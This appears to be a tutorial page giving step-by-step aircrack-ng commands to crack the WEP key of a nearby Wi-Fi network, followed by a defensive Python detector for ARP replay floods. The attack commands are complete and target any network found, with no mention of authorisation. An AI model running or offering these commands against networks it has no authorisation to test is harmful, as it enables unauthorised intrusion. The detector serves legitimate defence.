For this purpose we are going to use Ubuntu.
(1) First we have to install the aircrack-ng suite on the operating system:
sudo apt-get install aircrack-ng
(2) You need to become root first. To do so, type "su -" and enter your password.
(3) Now type the following command in the terminal:
# iwconfig wlan0 mode monitor
Note: If an error occurs, type "# iwconfig" in a terminal to check for your wireless interface.
(4) After that it's time to scan for a wireless network, which we will compromise for educational purposes. This time we will use the command:
# airodump-ng wlan0
(5) Once you've found one, abort the process with Ctrl+C. Now that we have our target, it's time to collect some information about the network. First of all, copy the MAC address of the access point, which is listed under BSSID (it should look something like 00:15:EB:E7: …). We also need to know the channel it is currently working on (shown under CH, e.g. 6). So let's gather our information with airodump-ng:
# airodump-ng -w wep -c 6 --bssid 00:15:EB:E7: … wlan0
(6) Now we need to open another terminal, in which we will use the ARP request replay attack to increase the number of data packets and gather the initialization vectors (IVs) of the access point chosen earlier.
# aireplay-ng -3 -b 00:15:EB:E7: … wlan0
(7) Let's go back to terminal 1 and have a look at the data packets. We need to have collected over 20 000 packets. If so, abort both airodump-ng and aireplay-ng.
Now we have everything required to decode the key of the wireless network. We do that with aircrack as shown below:
# aircrack-ng wep-03.cap
You should then see that the key has been decrypted 100% successfully, along with the key itself.
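The replay in step (6) is easy to spot from the monitoring side, because one transmitter sends the same-sized broadcast frame far faster than any normal client. The following is an added example, not part of the original page: a sliding-window detector run over constructed frame records, where the record layout, the thresholds and the MAC addresses are all assumptions.

```python
from collections import defaultdict, deque

# Assumed thresholds: tune them against a baseline of your own network.
WINDOW_S = 1.0        # sliding window length in seconds
MAX_IDENTICAL = 50    # same-length broadcast frames tolerated per window
BROADCAST = "ff:ff:ff:ff:ff:ff"

def detect_replay(frames, window=WINDOW_S, limit=MAX_IDENTICAL):
    """frames: (timestamp, bssid, src, dst, length) tuples sorted by timestamp,
    one per encrypted data frame seen by a sensor (hypothetical record layout).
    Returns the sorted (bssid, src, length) keys that exceeded the limit."""
    recent = defaultdict(deque)   # key -> timestamps still inside the window
    flagged = set()
    for ts, bssid, src, dst, length in frames:
        if dst != BROADCAST:      # ARP requests are addressed to broadcast
            continue
        key = (bssid, src, length)
        q = recent[key]
        q.append(ts)
        while ts - q[0] > window: # drop timestamps that fell out of the window
            q.popleft()
        if len(q) > limit:
            flagged.add(key)
    return sorted(flagged)

def sample_frames():
    """Constructed sample: one ordinary client and one replaying station."""
    ap = "02:00:00:00:00:aa"
    normal, flood = "02:00:00:00:00:01", "02:00:00:00:00:02"
    frames = [(t, ap, normal, BROADCAST, 68) for t in (0.0, 4.0, 9.0)]
    # Heavy unicast traffic from the ordinary client must not be flagged.
    frames += [(2.0 + i * 0.01, ap, normal, ap, 1500) for i in range(100)]
    # 200 identical-length broadcast frames in about half a second.
    frames += [(5.0 + i * 0.0025, ap, flood, BROADCAST, 68) for i in range(200)]
    return sorted(frames)

if __name__ == "__main__":
    for bssid, src, length in detect_replay(sample_frames()):
        print(f"possible ARP replay: {src} -> {bssid}, frame length {length}")
```

On a network that still runs WEP, an alert like this is also the signal to move the access point to WPA2 or WPA3, since the traffic volume it detects is what the key recovery depends on.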